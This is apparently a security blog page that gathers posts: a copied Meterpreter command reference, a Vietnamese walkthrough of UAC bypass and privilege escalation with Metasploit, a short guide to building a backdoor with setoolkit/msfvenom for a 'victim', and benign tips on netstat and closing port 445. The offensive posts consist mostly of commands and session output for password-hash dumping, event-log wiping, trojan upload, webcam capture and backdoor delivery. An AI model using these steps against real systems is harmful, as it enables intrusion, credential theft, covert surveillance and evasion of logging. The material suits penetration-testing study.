Pages

Meterpreter Basic Commands


Meterpreter Basic Commands

Metasploit Fundamentals



Using Meterpreter Commands

Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool. Throughout this course, almost every availableMeterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning.

help

The ‘help‘ command, as may be expected, displays the Meterpreter help menu.
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    channel       Displays information about active channels
...snip...

background

The ‘background‘ command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

cat

The ‘cat‘ command is identical to the command found on *nix systems. It displays the content of a file when it’s given as an argument.
meterpreter > cat
Usage: cat file

Example usage:
meterpreter > cat edit.txt
What you talkin' about Willis

meterpreter >

cd > pwd

The ‘cd‘ > ‘pwd‘ commands are used to change and display current working directly on the target host.
The change directory “cd” works the same way as it does under DOS and *nix systems.
By default, the current working folder is where the connection to your listener was initiated.
ARGUMENTS:
cd: Path of the folder to change to
pwd: None required
Example usuage:
meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
meterpreter >

clearev

The ‘clearev‘ command will clear the ApplicationSystem, and Security logs on a Windows system. There are no options or arguments.
Before using Meterpreter to clear the logs | Metasploit Unleashed
Before using Meterpreter to clear the logs | Metasploit Unleashed
Example usage:
Before
meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter >
After using Meterpreter to clear the logs | Metasploit Unleashed
After using Meterpreter to clear the logs | Metasploit Unleashed
After

download

The ‘download‘ command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

edit

The ‘edit‘ command opens a file located on the target host.
It uses the ‘vim’ so all the editor’s commands are available.
Example usage:
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
.
...snip...
.
100666/rw-rw-rw-  0       fil   2012-03-01 13:47:10 -0500  edit.txt

meterpreter > edit edit.txt

Please refer to the vim editor documentation for more advance use.
http://www.vim.org/

execute

The ‘execute‘ command runs a command on the target.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

getuid

Running ‘getuid‘ will display the user that the Meterpreter server is running as on the host.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

hashdump

The ‘hashdump‘ post module will dump the contents of the SAM database.
meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >

idletime

Running ‘idletime‘ will display the number of seconds that the user at the remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

ipconfig

The ‘ipconfig‘ command displays the network interfaces and addresses on the remote machine.
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address  : 192.168.1.104
Netmask     : 255.255.0.0

meterpreter >

lpwd > lcd

The ‘lpwd‘ > ‘lcd‘ commands are used to display and change the local working directory respectively.
When receiving a Meterpreter shell, the local working directory is the location where one started the Metasploit console.
Changing the working directory will give your Meterpreter session access to files located in this folder.
ARGUMENTS:
lpwd:  None required
lcd:  Destination folder
Example usage:
meterpreter > lpwd
/root

meterpreter > lcd MSFU
meterpreter > lpwd
/root/MSFU

meterpreter > lcd /var/www
meterpreter > lpwd
/var/www
meterpreter >

ls

As in Linux, the ‘ls‘ command will list the files in the current remote directory.
meterpreter > ls

Listing: C:\Documents and Settings\victim
=========================================

Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
...snip...


migrate

Using the ‘migrate‘ post module, you can migrate to another process on the victim.
meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

ps

The ‘ps‘ command displays a list of running processes on the target.
meterpreter > ps

Process list
============

    PID   Name                  Path
    ---   ----                  ----
    132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    288   snmp.exe              C:\WINDOWS\System32\snmp.exe
...snip...

resource

The ‘resource‘ command will execute Meterpreter instructions located inside a text file. Containing one entry per line, “resource” will execute each line in sequence. This can help automate repetitive actions performed by a user.
By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine).
meterpreter > resource 
Usage: resource path1 path2Run the commands stored in the supplied files.
meterpreter >
ARGUMENTS:
path1:  The location of the file containing the commands to run.
Path2Run: The location where to run the commands found inside the file
Example usage
Our file used by resource:
root@kali:~# cat resource.txt
ls
background
root@kali:~#
Running resource command:
meterpreter> > resource resource.txt
[*] Reading /root/resource.txt
[*] Running ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2012-02-29 16:41:29 -0500  .
40777/rwxrwxrwx   0       dir   2012-02-02 12:24:40 -0500  ..
100666/rw-rw-rw-  606     fil   2012-02-15 17:37:48 -0500  IDA Pro Free.lnk
100777/rwxrwxrwx  681984  fil   2012-02-02 15:09:18 -0500  Sc303.exe
100666/rw-rw-rw-  608     fil   2012-02-28 19:18:34 -0500  Shortcut to Ability Server.lnk
100666/rw-rw-rw-  522     fil   2012-02-02 12:33:38 -0500  XAMPP Control Panel.lnk

[*] Running background

[*] Backgrounding session 1...
msf  exploit(handler) >


search

The ‘search‘ commands provides a way of locating specific files on the target host. The command is capable of searching through the whole system or specific folders.
Wildcards can also be used when creating the file pattern to search for.
meterpreter > search
[-] You must specify a valid file glob to search for, e.g. >search -f *.doc
ARGUMENTS:
File pattern:   May contain wildcards
Search location: Optional, if none is given the whole system will be searched.
Example usage:
meterpreter > search -f autoexec.bat
Found 1 result...
    c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
    c:\\xampp\perl\bin\search.bat (57035 bytes)
meterpreter >

shell

The ‘shell‘ command will present you with a standard shell on the target system.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

upload

As with the ‘download‘ command, you need to use double-slashes with the upload command.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

webcam_list

The ‘webcam_list‘ command when run from the Meterpreter shell, will display currently available web cams on the target host.
Example usage:
meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
meterpreter >

webcam_snap

The ‘webcam_snap’ command grabs a picture from a connected web cam on the target system, and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename.
meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.

OPTIONS:

    -h      Help Banner
    -i >opt>  The index of the webcam to use (Default: 1)
    -p >opt>  The JPEG image path (Default: 'gnFjTnzi.jpeg')
    -q >opt>  The JPEG image quality (Default: '50')
    -v >opt>  Automatically view the JPEG image (Default: 'true')

meterpreter >
OPTIONS:
-h: Displays the help information for the command
-i opt: If more then 1 web cam is connected, use this option to select the device to capture the
        image from
-p opt: Change path and filename of the image to be saved
-q opt: The imagine quality, 50 being the default/medium setting, 100 being best quality
-v opt: By default the value is true, which opens the image after capture.

Example usage:
meterpreter > webcam_snap -i 1 -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
meterpreter >
Using webcam_snap Meterpreter plugin | Metasploit Unleashed
Using webcam_snap Meterpreter plugin | Metasploit Unleashed


Tham Khảo:offensive-security.com
thudinh Network and Security

Nâng quyền và leo thang bậc quyền


Trường hợp giả định:

Sau khi ta có một session Meterpreter đang chạy trên mục tiêu, và việc tiếp theo ta cần làm là kiểm tra phiên bản hệ điều hành, cấu hình hệ thống và quyền hạn hiện có, và thực hành nâng quyền lên Administrator.
Vượt qua UAC và chiếm quyền Administrator.


Bắt đầu thực hành:

Kiểm tra phiên bản hệ điều hành:
meterpreter > sysinfo
Như ở trên ta thấy tên máy tính, phiên bản hệ điều hành, cấu trúc hệ điều hành, domain, ngôn ngữ hệ thống, và số lượng người dùng đang đăng nhập.
Tiếp theo là xem quyền hiện có và thiếp lập UAC có đang bật không? Ta có thể sử dụng post/windows/gather/win_privs từ msf > bằng lệnh use và exploit, tuy nhiên phải thiết lập tham số SESSION.
Ở đây, ta có thể chạy thẳng trên meterpreter > bằng lệnh run như sau:
meterpreter > run post/windows/gather/win_privs
Kết quả cho ta thấy được session đang không được chạy bằng quyền Administrator, không phải System và thiết lập UAC đang bật.
Có thể bạn đã biết (hoặc chưa) thì để chạy một ứng dụng với quyền Administrator trên Windows bạn phải vượt qua một bước xác nhận của UAC (User Account Control), vậy thì việc trước mắt ta cần phải làm đó là tắt UAC đi.
Tạm thời tắt meterpreter > đi, quay lại với msf >:
meterpreter > background
và hãy tìm kiếm một cái gì đó liên quan đến UAC mà ta có thể sử dụng được nào.
msf > search uac
Kết quả cho ta thấy chúng ta có 4 exploit dùng để bypass (vượt qua) bảo vệ của UAC, vậy thì hãy sử dụng nó thử xem nào. Mình sẽ chọn exploit/windows/local/bypassuac cơ bản nhất để thử trước, bạn có thể sử dụng lệnh info để xem thông tin của exploit trước khi lựa chọn sử dụng:
msf > use exploit/windows/local/bypassuac
Tiếp theo là xem và thiết lập các tham số. Rồi cho chạy exploit đó:
msf exploit(bypassuac) > show options
msf exploit(bypassuac) > set SESSION <ID>
msf exploit(bypassuac) > exploit
Hãy thay <ID> lại thành ID của một session đang chạy.

Nếu kết quả thu được báo lỗi không thành công vì không thể nhận dữ liệu trên port 4444.
Vậy thì hãy thiết lập lại tham số LPORT bằng một giá trị khác và cho chạy lại. Ví dụ:
msf exploit(bypassuac) > set LHOST 172.16.100.3
msf exploit(bypassuac) > set LPORT 8080
msf exploit(bypassuac) > exploit
Lần này đã chạy thành công, ta hãy kiểm tra quyền hạn lại vẫn bằng post/windows/gather/win_privstrực tiếp trên meterpreter > session mới vừa được mở ra.
post/windows/gather/win_privs
post/windows/gather/win_privs
Lần này thì giá trị Is Admin là true, ta hãy thử dùng một vài lệnh mà cần quyền Administrator xem nào, ví dụ lệnh clearev dùng để xóa Event Log:
meterpreter > clearev
clear event log
clear event log
Vậy là ta đã thành công!!

tham khảo: thekalitools.com
thudinh Network and Security

how to make payload rootkit/backdoor


step1: 
root@kali:~#setoolkit
Step2:
press 1 - enter
Step3:
press 4 - enter
Step4:
Press 2 - enter
set parameter as LHOST/ Port listener

Return back to: root@kali:~#

And this is payload was created
and copy it to desktop of kali

Next step: We use msfvenom to create meterpreter payload
Now we broadcast backdoor to victim.

Attack victim now
#msfconsole
Waiting victim run backdoor.exe
We attack success: 
thudinh Network and Security

How to Share Folder in Kali to See in Windows..


cd /root/Desktop
Then use this command to create an http server
python -m SimpleHTTPServer


Then from Windows machine open a browser and insert this on the URL:
<kali-ip:8000>
Now you can downlaod all the files in the desktop directory.
thudinh Network and Security

Close Port 445 on windows


To close it, log in as an administrator, and do the following:

1. In the run box, type "services.msc" and run the Services console

2. Scroll down to find the service "Server"

3. Right-click "Server" and select Properties

4. Stop the service, and then click the drag-down box in the center, and select Disable.

5. Restart the system.

thudinh Network and Security

How can I quickly find listening/open ports on my computer ?


You can use the NETSTAT command to quickly see all the used and listening ports on your computer. Note it is not a complete substitute for a port scanning tool. If you'd like to have your computer remotely scanned for open ports use our Security Scan instead.

To see a list of listening ports, open Command Prompt and type:

C:\> netstat -an |find /i "listening"

You can change "listening" to "established" to see what ports your computer actually communicates with.

It is also useful to use the -o switch with the NETSTAT command to also get a list of all the owning process ID associated with each connection. You can then use those process ids (PIDs) to find out the name of the processes associated with open/listening ports in the Windows Task Manager

C:\> netstat -ao |find /i "listening"

To see all open, closing, established and listening ports, simply use:

C:\> netstat -a (or netstat -ao in XP/Win2k3)

You can also make the netstat command refresh periodically by adding a number of seconds at the end, for example, to make it refresh every 5 seconds, use something like:

C:\> netstat -an 5


Notes:
The netstat command has a number of other useful command line parameters, you can see short description of all of them using: netstat /?
Also, you might want to perform an outside port scan to see what ports are accepting connections according to an external machine. See: SG Security Scan
You can see process identifiers using the following command at the command prompt: tasklist and tasklist /svc
thudinh Network and Security

Adsense

Translate